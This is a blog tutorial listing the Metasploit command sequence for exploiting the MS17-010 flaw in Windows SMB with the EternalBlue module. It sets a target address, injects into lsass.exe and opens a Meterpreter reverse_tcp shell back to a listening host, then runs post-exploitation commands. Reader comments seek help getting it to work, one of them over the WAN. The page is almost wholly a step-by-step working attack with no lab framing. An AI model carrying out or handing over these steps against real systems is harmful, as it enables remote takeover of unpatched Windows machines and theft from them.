MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Previously we identified the MS17-010 vulnerability by scanning using NMAP and by scanning with a Metasploit auxiliary module.

In the video below we will exploit the MS17-010 vulnerability by using the EternalBlue Metasploit module which comes by default with Metasploit Framework.

Metasploit commands used in this video:
search ms17_010
This command identifies modules containing the "ms17_010" string.
use exploit/windows/smb/ms17_010_eternalblue
This command selects the "exploit/windows/smb/ms17_010_eternalblue" module.
show options
This command displays the options available for the selected module.
set processname lsass.exe
This commands selects the process to inject the payload into.
set rhost <IP_Address>
This command sets the target IP address.
show payloads
This command (when is executed under the module context), shows the payloads compatible with the selected module.
set payload windows/x64/meterpreter/reverse_tcp
This command selects the Meterpreter reverse_tcp payload.
set lhost <IP_Address>
This command sets the listening IP address.
exploit
This command starts the exploit process.
sysinfo
This Meterpreter command displays information about the target system (after performing successful exploitation and after a Meterpreter session was established)
getuid
This Meterpreter command displays the Meterpreter user on the target.
exit
This Meterpreter command closes the current Meterpreter session.



Comments

  1. RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30). What's seems to be the problem when we facing this? Scan whole subnet every one of them getting timeout . Even when using scanner, the metasploit bold the ip with information that the ip has been breached by double pulsar

    ReplyDelete
    Replies
    1. Seems strange ... might be worthwhile to fully update your Kali Linux installation. That will update your Metasploit installation also.

      Delete
    2. Yeah, I get the RubySMB...... error too, tried several settings but the exploit cant seem to run past that point!!

      Delete
  2. Need Help. How to i achieve this over the Wan? I've forwarded the port and whenever i exploit it shows Handler failed to bind to my External IP.

    Your help in setting this up would really be appreciated

    ReplyDelete

Post a comment

Popular Posts

Generating shellcode - using msfvenom to generate a binary payload

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux